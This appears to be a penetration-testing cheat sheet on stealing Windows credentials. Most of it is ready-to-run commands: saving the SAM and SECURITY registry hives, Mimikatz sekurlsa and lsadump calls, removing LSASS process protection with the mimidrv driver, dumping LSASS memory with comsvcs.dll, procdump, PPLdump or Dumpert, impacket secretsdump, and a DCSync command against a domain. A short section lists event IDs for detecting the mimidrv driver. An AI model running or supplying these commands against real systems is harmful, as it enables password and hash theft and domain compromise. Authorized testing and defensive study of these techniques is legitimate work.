Navigation :

Password mining

Get the NetNTLMv1 hash of the current user: https://github.com/eladshamir/Internal-Monologue

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves it has the credentials but does not send them to the server (creds are not in memory)
Non-network logon (Interactive/NetworkCleartext/…): the client sends credentials to the service (creds are in lsass.exe)

SAM

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY

reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

lsadump::sam

load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump

scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

Cache

lsadump::cache /system:system /sam:sam /security:security

run post/windows/gather/cachedump

LSASS

LSASS is protected

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL 
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

Using Mimikatz

If LSASS is protected (Full WinTcb), try to add or remove process protection using Mimidrv. It requires SeLoadDriverPrivilege.

It starts a service using advapi32!ServiceCreate granting access to the service to Everyone group.

Windows Event ID 7045 & 4697 - Service Creation
- Service Name: “mimikatz driver (mimidrv)”
- Service File Name: *\mimidrv.sys
- Service Type: kernel mode driver (0x1)
- Service Start Type: auto start (2)

Event ID 4697 contains information about the account that loaded the driver. Audit Security System Extension must be configured via Group Policy for this event to be generated.

Sysmon Event ID 11 - File Creation
- TargetFilename: *\mimidrv.sys
Sysmon Event ID 6 - Driver Loaded
- ImageLoaded: *\mimidrv.sys
- SignatureStatus: Expired

!+
!processProtect /process:mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Cleaning steps

!processprotect /process:lsass.exe
!-

PPLdump64

PPLdump64.exe -v lsass lass.dmp

LSASS is not protected

rundll32.exe comsvcs.dll, #24 "<PID> my.dmp full"

sqldumper.exe <PID> 0 0x0110

Remove banners before compilation: https://github.com/outflanknl/Dumpert
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump

procdump.exe -accepteula -ma lsass.exe dump.dmp

sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
-----
sekurlsa::logonPasswords full
-----
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)

use post/windows/gather/smart_hashdump
-----
load kiwi
creds_all

wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]

DCSync

lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]